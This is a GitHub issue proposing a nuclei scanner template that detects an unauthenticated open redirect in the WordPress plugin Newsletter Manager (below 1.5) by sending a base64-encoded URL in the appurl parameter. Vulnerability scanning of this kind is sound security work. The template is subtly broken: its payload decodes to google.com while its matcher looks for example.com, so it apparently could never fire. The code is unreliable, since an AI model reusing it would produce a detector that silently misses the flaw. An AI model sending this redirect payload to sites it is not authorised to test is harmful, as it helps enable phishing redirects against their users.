### ISSUE TITLE
Newsletter Manager < 1.5 - Open Redirect

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4333]
```yaml
id: newsletter-manager-redirect

info:
  name: Newsletter Manager < 1.5 - Unauthenticated Open Redirect
  author: akincibor
  severity: low
  description: The plugin used base64 encoded user input in the appurl parameter without validation, to redirect users using the header() PHP function, leading to an open redirect issue.
  reference:
    - https://wpscan.com/vulnerability/847b3878-da9e-47d6-bc65-3cfd2b3dc1c1
  tags: wp-plugin,redirect,wordpress,wp

requests:
  - method: GET
    path:
      - "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL3d3dy5nb29nbGUuY29t"

    matchers:
      - type: regex
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
        part: header
```
